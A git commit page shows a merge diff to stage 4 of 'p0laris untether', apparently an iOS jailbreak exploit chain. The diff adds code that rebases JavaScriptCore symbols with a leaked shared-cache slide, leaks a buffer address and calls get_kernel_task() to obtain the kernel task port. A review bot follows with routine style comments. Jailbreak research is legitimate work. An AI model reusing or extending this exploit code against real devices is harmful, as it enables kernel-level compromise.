| author | spv420 <spv@spv.sh> | 2022-07-31 17:59:28 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 17:59:28 -0400 |
| commit | adc93da5f2940ba1429e392ee9b1804b541e14f6 (patch) | |
| tree | 324a60d72e481f632734adf022b1db01207f8b4f /src/stage4/main.js | |
| parent | d1bfa6b5c947431ecf331c1222f47196b1834850 (diff) | |
| parent | b88cb06e11df31cb7f079d2c78c42b7fced7bb17 (diff) | |
Merge branch 'master' of https://github.com/p0larisdev/untether
Diffstat (limited to 'src/stage4/main.js')
| -rw-r--r-- | src/stage4/main.js | 24 |
1 files changed, 22 insertions, 2 deletions
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 959f4b5..af2ed69 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -12,13 +12,33 @@ var SOCK_DGRAM = 2;
 var SOCK_DGRAM = 2;
 var IPPROTO_UDP = 17;
+function prep_shit() {
+ string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+ global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ large_buf_ptr = leak_vec(large_buf);
+}
+
 function main() {
 syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
 p0laris_log("[*] we out here");
 p0laris_log("[*] landed in stage4");
- printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
- printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
+ p0laris_log("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
+ p0laris_log("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
+
+// printf = p0laris_log;
+
+ printf("test");
+
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+ sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+ sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+ prep_shit();
+
+ var tfp0 = get_kernel_task();
 syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 return 0;
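Review bot: prep_shit() assigns string_ref, global_object, jsobj_addr and large_buf_ptr without `var`, so they become implicit globals (and would throw under strict mode); if they are meant as shared state, declare them at file level, otherwise prefix each assignment with `var`. In the same function `read_u32(slid + reserve_addr + 0x44)` is evaluated twice and could be held once, `var ctx = read_u32(slid + reserve_addr + 0x44);`, then passed to both scall() calls. Further down, `printf("test");` and the commented-out `// printf = p0laris_log;` look like debugging leftovers, and `var tfp0 = get_kernel_task();` is never read within the hunk; main()'s closing brace lies outside it. It is also not visible whether p0laris_log expands printf-style format strings, so if it is a plain logger the two converted lines would emit the literal `0x%08x` instead of the slide values — worth confirming.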
